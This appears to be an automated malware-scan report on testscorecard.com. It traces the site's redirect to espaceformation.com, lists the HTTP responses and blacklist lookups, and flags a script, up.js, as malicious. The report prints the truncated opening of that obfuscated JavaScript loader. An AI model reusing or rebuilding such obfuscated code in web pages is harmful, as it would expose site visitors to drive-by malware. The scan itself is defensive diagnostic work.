Scanned pages/files
Request | Server response | Status |
http://testscorecard.com/ | HTTP/1.1 302 Found Connection: close Date: Tue, 03 Jun 2014 23:09:27 GMT Location: http://espaceformation.com/scripts/reg/authorize.php Server: Apache Content-Length: 236 Content-Type: text/html; charset=iso-8859-1 | clean |
http://espaceformation.com/scripts/reg/authorize.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 03 Jun 2014 23:09:28 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://www.espaceformation.com/scripts/reg/authorize.php Server: Apache Vary: Accept-Encoding Content-Length: 264 Content-Type: text/html; charset=iso-8859-1 X-Varnish: 591358994 | clean |
http://www.espaceformation.com/scripts/reg/authorize.php | 200 OK Content-Length: 1283 Content-Type: text/html | clean |
http://www.espaceformation.com/scripts/reg/modernizr.custom.63321.js | 200 OK Content-Length: 9661 Content-Type: application/javascript | clean |
http://espaceformation.com/scripts/up.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 03 Jun 2014 23:09:28 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://www.espaceformation.com/scripts/up.js Server: Apache Vary: Accept-Encoding Content-Length: 252 Content-Type: text/html; charset=iso-8859-1 X-Varnish: 591359000 | clean |
http://www.espaceformation.com/scripts/up.js | 200 OK Content-Length: 2128 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(NCZ){var Z8j="\xe4\xf0\xda\xa44\xe2\xbe4m\xff\x8f\xd2\xbe~\x9c\x9ere2\x0a\x0c\x0b\x0e&\x08\x08\x0f\x0a\x0c\x09\x0a\x0b\x0a\x0e\x0c\x0f\x08%\x0e\x08\x0b\x09\x0f\"\x08\x0c\x0a\x08\x09\x0d\x0b\x20#\x08\x08\x0f\x0f\x0e%!\x0a&\x0f!\x0f\x0e!\x0e\x09\x0f\x0a\x09%\"*/4]hSjWE2bPMA0phd(*-epo`r"+"knh/ivw+{`gT85{41).2y`f,4xg0**0>OLU<+`woeshkn*z*~tdw#d<XAF)$G]|7dDiweaoAa`Mx\x20(*@E,\"VdFYz2cm'(/AF)$Li"+"Lllv!,.BA+'Qz^eb$.-CD*\"AxSkmegoMcb#/+F@(\x20DkPLobOfH~q`rZ[cNlnhE'+)BG-#mjWb$. Antivirus reports:
| ||
http://testscorecard.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Tue, 03 Jun 2014 23:09:29 GMT Location: http://espaceformation.com/scripts/reg/authorize.php Server: Apache Content-Length: 236 Content-Type: text/html; charset=iso-8859-1 | clean |
http://espaceformation.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 03 Jun 2014 23:09:29 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://www.espaceformation.com/test404page.js Server: Apache Vary: Accept-Encoding Content-Length: 253 Content-Type: text/html; charset=iso-8859-1 X-Varnish: 591359004 | clean |
http://www.espaceformation.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: testscorecard.com
Result:
HTTP/1.1 302 Found
Connection: close
Date: Tue, 03 Jun 2014 23:09:27 GMT
Location: http://espaceformation.com/scripts/reg/authorize.php
Server: Apache
Content-Length: 236
Content-Type: text/html; charset=iso-8859-1
...236 bytes of data.
GET / HTTP/1.1
Host: testscorecard.com
Result:
HTTP/1.1 302 Found
Connection: close
Date: Tue, 03 Jun 2014 23:09:27 GMT
Location: http://espaceformation.com/scripts/reg/authorize.php
Server: Apache
Content-Length: 236
Content-Type: text/html; charset=iso-8859-1
...236 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: testscorecard.com
Referer: http://www.google.com/search?q=testscorecard.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: testscorecard.com
Referer: http://www.google.com/search?q=testscorecard.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=testscorecard.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://testscorecard.com/
Result: testscorecard.com is not infected or malware details are not published yet.
Result: testscorecard.com is not infected or malware details are not published yet.